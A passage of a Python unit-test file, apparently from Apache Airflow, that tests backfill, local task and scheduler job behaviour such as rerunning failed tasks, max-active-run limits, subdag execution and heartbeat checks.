dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
d0 = DEFAULT_DATE
d1 = d0 + datetime.timedelta(days=1)
d2 = d1 + datetime.timedelta(days=1)
# test executor history keeps a list
history = executor.history
self.maxDiff = None
self.assertListEqual(
# key[0] is dag id, key[3] is try_number, we don't care about either of those here
[sorted([item[-1].key[1:3] for item in batch]) for batch in history],
[
[
('leave1', d0),
('leave1', d1),
('leave1', d2),
('leave2', d0),
('leave2', d1),
('leave2', d2)
],
[('upstream_level_1', d0), ('upstream_level_1', d1), ('upstream_level_1', d2)],
[('upstream_level_2', d0), ('upstream_level_2', d1), ('upstream_level_2', d2)],
[('upstream_level_3', d0), ('upstream_level_3', d1), ('upstream_level_3', d2)],
]
)
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
executor=TestExecutor(),
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_first_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=TestExecutor(),
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_backfill_depends_on_past_backwards(self):
"""
Test that backfill runs fine forwards and that run_backwards (the CLI -B flag) raises when a task has depends_on_past set
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
ignore_first_depends_on_past=True,
**kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
with self.assertRaisesRegexp(AirflowException, expected_msg):
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
run_backwards=True,
**kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
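# Helper: builds an @hourly DAG of four dummy operators with a configurable
# max_active_runs limit, shared by the max-limit backfill tests below.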
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
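# The backfill runs in a background thread. That thread first creates a RUNNING
# dag run outside the backfill range (using up the single max_active_runs slot),
# notifies the main thread, then starts the backfill, which has to wait until
# the main thread marks the existing run SUCCESS.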
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to proceed by setting the existing dag run to SUCCESS;
# the backfill will then execute its dag runs one by one
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run because the existing DagRun lies within the backfill
# date range and therefore does not count against the max active limit.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# With max_active_runs limited to 1, the backfill job has to loop 3 times
# to work through the date range
success_expected = 2
executor = TestExecutor()
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
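# Backfilling a sub_dag built from task_regex="leave*" should only run the
# leave tasks; the other task instances in the dag run stay in State.NONE.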
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# wire dependencies in a deliberately shuffled order
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
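# Pre-set a mix of task instance states; backfill should run only the
# UP_FOR_RETRY, SCHEDULED and stateless instances to SUCCESS, leave the
# FAILED/SKIPPED/UPSTREAM_FAILED ones as they are, and fail the dag run.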
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 is left with no state (None)
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Check that all downstream tasks of the parent DAG
# have been cleared as well
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor()
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
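# Exercises BackfillJob._update_counters: a running task instance should be
# moved out of ti_status.running and into the bucket matching its new state
# (succeeded, skipped, failed, or back to to_run for retry/reschedule/none).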
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
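# get_run_dates returns a single date for a DAG with no schedule_interval,
# and one date per hour (both endpoints included) for an @hourly schedule.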
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
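# With run_backwards=True the backfill should queue the newest execution date
# first, so queued_dttm values appear in reverse execution_date order.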
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling', TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Ensure that marking a task as success in the UI doesn't cause
the task to fail, and that the task process exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
clear_db_pools()
clear_db_dags()
clear_db_sla_miss()
clear_db_errors()
# Speed up some tests by not running the tasks, just look at what we
# enqueue!
self.null_exec = TestExecutor()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
def run_single_scheduler_loop_with_no_dags(self, dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
executor=self.null_exec,
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1,
executor=TestExecutor(do_update=False))
scheduler.run()
shutil.rmtree(empty_dir)
scheduler.executor.terminate()
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
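# Executor events are only applied to task instances whose dag is present in
# the SimpleDagBag passed to _process_executor_events.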
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor(do_update=False)
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
